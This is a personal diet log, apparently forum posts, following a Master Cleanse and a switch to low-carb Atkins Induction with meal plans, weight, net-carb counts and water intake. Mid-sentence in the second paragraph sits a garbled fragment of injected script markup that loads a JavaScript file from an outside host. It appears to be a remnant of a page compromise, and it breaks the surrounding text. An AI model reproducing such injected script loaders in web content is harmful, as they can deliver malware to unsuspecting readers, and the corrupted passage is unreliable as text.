I have been doing a 15 day Master Cleanse, it will end on 4/28. Once I've eased out, I will do low carb. Did Atkins a few years ago, and it's the only thing that makes sense.

Okay, I'm seriously on the diet again.  I had little spastic cheats but nothing that ruined my progress~< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
Currently 170 even.  I think I should be beginning ketosis by now. Let the progress continue!

LoL, yea my cheats have spanned over the two day period, but I've so far I've been sticking to m-f eating clean, then pigging out sat/sun.
Thinking about trying that master cleanse though. I've never done it before

My last day on Master Cleanse. Will start a low carb way of eating starting tomorrow. Stocked up on Chicken, Pork Chops, and Eggs today. I have 12 lbs more to lose. My biggest problem is exercising. Not a fan So here comes 14 days of Induction !!!!

Started Low Carb- this morning. For the first 14 days I will keep it as simple as possible. Breakfast..2-Egg Omlette with approx. 1 oz Baby Bella Mushrooms Lunch... approx. 3.5 oz Salmon Snack..Pork Rinds. Dinner...approx. 2 oz Spinach, Mushrooms, and kalamata Olives. 3 oz Pork Chop.
I will be eating similar to this for the next 14 days and see how things go. If there is no progress I will reevaluate.
Water so far, 125 ounces!!!

Day 2. 8 NC, playing it safe. Hope I am not fooling myself by being too liberal with the butter (it's so good), and not being more restrictive with the meats. Maybe I will try to keep the meat protein to 3.5 ounces

Still keeping up with this low carb eating plan. Can't seem to get my above 8-NC. I hope it's enough. Not counting fats, but at dinner today I could not finish all my chicken, so I did not push myself. Developed a "kitchen closed at 7 pm" policy for myself. Tend to munch on Pork rinds at night, then get super thirsty.... I will still have water or Tea if I feel the need.
